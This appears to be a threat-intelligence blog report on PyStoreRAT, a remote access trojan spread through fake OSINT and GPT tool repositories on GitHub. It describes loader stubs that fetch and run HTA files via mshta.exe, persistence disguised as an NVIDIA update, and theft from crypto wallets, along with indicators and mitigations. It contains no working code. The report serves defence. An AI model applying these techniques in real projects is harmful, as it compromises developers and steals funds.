.png){kind=logo}
PyStoreRAT Malware Campaign: Fake OSINT and GPT GitHub Repositories Target Security Researchers and Cryptocurrency Users
- Rescana
- 2 days ago
- 4 min read
Date: December 2025 Prepared by: Rescana OSINT Cybersecurity Research Team
Executive Summary
A sophisticated malware campaign is leveraging fake GitHub repositories, masquerading as OSINT (Open Source Intelligence) and GPT utility tools, to distribute a new modular Remote Access Trojan (RAT) named PyStoreRAT. The campaign targets security researchers, developers, and cryptocurrency users, using deceptive social engineering and supply chain tactics to propagate the malware. The campaign has been active since at least June 2025, with a notable increase in activity and repository popularity in late 2025.
Technical Analysis
Infection Chain
Initial Vector:
Malicious Python or JavaScript loader stubs are embedded in GitHub repositories posing as OSINT tools, DeFi bots, GPT wrappers, and security utilities.
These repositories are promoted via social media (YouTube, X/Twitter) and artificially inflated with stars/forks to appear legitimate (Stargazers Ghost Network).
Loader Execution:
The loader contains minimal code, designed to silently download a remote HTML Application (HTA) file and execute it using
mshta.exe
.
If security products like CrowdStrike Falcon or ReasonLabs are detected, the loader attempts to evade detection by launching mshta.exe via cmd.exe.
Payload Delivery:
The HTA payload delivers PyStoreRAT, a modular, multi-stage RAT capable of executing EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules.
The RAT profiles the system, checks for admin privileges, and scans for cryptocurrency wallet files (Ledger Live, Trezor, Exodus, Atomic, Guarda, BitBox02).
Persistence & Evasion:
Persistence is established via a scheduled task disguised as an NVIDIA app self-update.
The malware deletes the scheduled task post-infection to remove forensic traces.
Command & Control (C2):
PyStoreRAT contacts an external server to fetch and execute commands, including:
Downloading/executing EXE payloads (e.g., Rhadamanthys info-stealer)
Downloading/extracting ZIPs
- Executing DLLs via
rundll32.exe
Executing JavaScript in memory (
eval()
)
Installing MSI packages
Spawning additional
mshta.exe
processes
Executing PowerShell in memory
Spreading via removable drives (malicious LNK files)
Deleting persistence tasks
Affected Product Versions
PyStoreRAT is not exploiting a specific software vulnerability, but rather abusing the trust in open-source repositories and targeting users who download and execute code from the following types of repositories:
Fake OSINT tools (no legitimate product versions, but any repository claiming to be an OSINT tool, DeFi bot, or GPT utility published or updated between June 2025 and December 2025 should be considered suspect if not from a verified source)
Cryptocurrency wallet software targeted for data theft (not infection):
Ledger Live (all versions, as the malware scans for wallet files)
Trezor (all versions)
Exodus (all versions)
Atomic Wallet (all versions)
Guarda Wallet (all versions)
BitBox02 (all versions)
Note: The infection occurs via execution of malicious code from GitHub, not via a vulnerability in the above wallet products themselves.
Indicators of Compromise (IOCs)
Loader Behavior:
- Python/JavaScript code in GitHub repos that downloads and executes remote HTA files via
mshta.exe
Persistence:
Scheduled task named or disguised as NVIDIA app self-update
C2 Communication:
Outbound connections to attacker-controlled servers (specific domains/IPs not published in open sources as of this report)
File Artifacts:
Presence of
mshta.exe
processes spawned from suspicious scripts
Malicious LNK files on removable drives
Wallet Targeting:
Scanning for files related to Ledger Live, Trezor, Exodus, Atomic, Guarda, BitBox02
Exploitation in the Wild
Victims:
Security researchers, IT administrators, and cryptocurrency users downloading tools from GitHub
Observed Tactics:
Use of trending and popular repository lists to increase visibility
Social media campaigns to drive traffic to malicious repos
Use of dormant or newly created GitHub accounts for repository creation
Payloads delivered via "maintenance" commits after initial trust is established
Attribution
Origin:
Russian-language artifacts and coding patterns suggest an Eastern European threat actor (Morphisec)
APT/Group:
No direct attribution to a known APT group as of this report
MITRE ATT&CK Mapping
Initial Access:
T1195.002 - Supply Chain Compromise: Compromise Software Dependencies and Development Tools
Execution:
Persistence:
Defense Evasion:
Credential Access/Collection:
Lateral Movement:
Mitigation Strategies (Specific)
Repository Verification:
Only download tools from well-known, verified GitHub accounts and cross-check with official project websites or trusted sources.
Code Review:
Manually inspect code for suspicious loader stubs, especially those invoking
mshta.exe
or downloading remote HTA files.
Network Monitoring:
Monitor for unusual outbound connections, especially to newly registered domains or IPs associated with C2 infrastructure.
Endpoint Detection:
Alert on the creation of scheduled tasks disguised as NVIDIA or other legitimate software updaters.
Monitor for execution of
mshta.exe
from non-standard locations or by scripts.
Removable Media Controls:
Block or restrict execution of LNK files from removable drives.
References
For further details or incident response support, contact Rescana Threat Intelligence.
About Rescana
Rescana is a leader in third-party risk management (TPRM), providing organizations with advanced tools to assess, monitor, and mitigate cyber risks across their digital supply chains. Our platform leverages cutting-edge threat intelligence, automation, and analytics to deliver actionable insights and enhance your organization’s security posture. For more information about our solutions or to discuss how we can help you address emerging cyber threats, we are happy to answer questions at ops@rescana.com.